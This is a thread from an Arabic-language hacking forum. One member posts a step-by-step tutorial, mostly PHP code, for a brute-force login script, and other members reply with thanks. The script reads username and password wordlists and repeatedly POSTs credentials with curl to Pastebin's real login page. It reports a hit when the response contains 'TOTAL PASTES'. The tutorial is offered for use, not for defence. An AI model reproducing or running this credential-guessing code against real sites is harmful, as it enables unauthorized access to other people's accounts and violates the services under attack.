• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع fantome195
  • تاريخ البدء
غير متصل

Developer
إنضم
4 يونيو 2012
المشاركات
78
الإعجابات
0
النقاط
30
الإقامة
Morocco
الإجابات المقدمة: 0
#1


.::سكريبتات التخمين و كيفية برمجتهم :cًoُnُfuُseٌd: ::.

الشغلة سهلة ومافيها أي تعقيد

أوكي نبدأ بالشرح

شوف مثلا لدينا لوحة لدينا خانة اليوزر والباسورد وكل وحدة عندها إسم

أوكي أول شيئ لما نحب نبرمج وحدة نستخرج الخانات لي نحتجها أوكي رح نجرب اليوم على
pastebin


نفتح أي أداة لأستقبال مبادلات
Post


مثلا http headers

وندخل أي شيئ في الخانات ونط أوكي شوفو الصورة



أوكي لدينا فالبوست

PHP:
submit_hidden=submit_hidden&user_name=dzdz&user_password=dzdz&submit=Login
أوكي نحن أدخلنا dzdz كيوزر و باسورد
الأن نحتاج

PHP:
submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login
هذا هو البوست الي رح نكرره حتى غيجاد الباسورد

نبدأ فالبرمجة

أولا رح نبرمج من cli

نقوم بفتح وسم

php

ثم نقوم بجلب محتوى اليوزرات و الباسوردات من ملف

بإستعمال دالة

file_get_contents

و الفصل بين كل يوزر وباسورد ب

\n

والتي تمثل سطر جديد بإستعمال الدالة

explode

لازم تكون تعرف شوية أساسيات php

PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
?>
أوكي الأن نعمل تكرار لكل باسورد ليدور على شكل حلقات و نبدأ باليوزرات ليدور عليه كل

الباسوردات على كل يوزر

و نعمل trim

لفصل المسافات الفارغة

PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
foreach($user as $u )
{
$us=trim($u);
foreach($password as $passs){
$pwd=trim($passs);
}
}
?>
أوكي الأن نبرمج دالة التخمين

رح نستعمل مكتبة الكيرل يمكنك البحث عنها في قوقل

راح أشرح ف التعليقات

PHP:
<?
function brut($user,$pass){
$post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");// هذا البوست الي إستخرجهاه من قبل  مع وصع مكان اليوزر والباس في مكانهم في البوست وضعناهم في مصفوة
   $urlv='http://pastebin.com/login.php';// رابط الدخول 
                $sh = curl_init();// بدأ أو إعلان عن جلسة كيرل 
                curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);///redirction إتباع تغير الرابط مثلا إذا كان يقوم ب  
                curl_setopt($sh,CURLOPT_URL, $urlv);/// الرابط المرجة العمل عليه 
                curl_setopt($sh,CURLOPT_POSTFIELDS,$post);// submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login خانات البوست الي عملها في مصفوفة لتنظيم ويمكنك وضعهم كماهم  مثلا  
                $brute = curl_exec($sh);// تنفيد الجلسة 
                if(eregi('TOTAL PASTES' , $brute))///فأذا وجدها في الناتج عن تنفيد الجلسة يرجع القيمة صحيحة و بذلك قد تم التخمين  TOTAL PASTES الأعتماد على 
                {
                  return true;
                }else{
               return false;
 
                }
  }
?>
أوكي نجمع الأ، الكود !$^@

PHP:
<?
$user=explode('\n',file_get_contents("./user.txt"));
$password=explode('\n',file_get_contents("./pass.txt"));
foreach($user as $u )
{
$us=trim($u);
foreach($password as $passs){
$pwd=trim($passs);
$p=brut($us,$pwd);
if($p){
echo"
[+] Found $us -> $pwd 
";
}
}
}
 function brut($user,$pass){
    $post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");
   $urlv='http://pastebin.com/login.php';
                $sh = curl_init();
                curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
                curl_setopt($sh,CURLOPT_URL, $urlv);
                curl_setopt($sh,CURLOPT_POSTFIELDS,$post);
                $brute = curl_exec($sh);
                if(eregi('TOTAL PASTES' , $brute))
                {
                  return true;
                }else{
               return false;
 
                }
  }
?>
true عملنا تحقق بدالة إذا أرجعت الدالة قيمة صحيحة

يطبع اليوزر والباسورد الدي تم الدخول له

أنا قمت بعمل أداة على السريع البارحة

مرتب يها الأكواد

الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.
 


غير متصل

or0


V • I • P
إنضم
22 فبراير 2014
المشاركات
348
الإعجابات
14
النقاط
50
الإجابات المقدمة: 3
#2
رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

شكرا لك عزيزي .
 


غير متصل

Developer
إنضم
1 مايو 2014
المشاركات
28
الإعجابات
0
النقاط
5
الإجابات المقدمة: 0
#3
رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

ما شاء الله...بارك الله فيك:{10}:
 


غير متصل

Developer
إنضم
15 يونيو 2012
المشاركات
8
الإعجابات
0
النقاط
5
الإقامة
█ Jordan █
الإجابات المقدمة: 0
#4
رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

يعطيك العافيه
 


الوسوم - Tag الوسوم - Tag
شرح برمجة سكريبتات التخمين بلغة البي اتش بي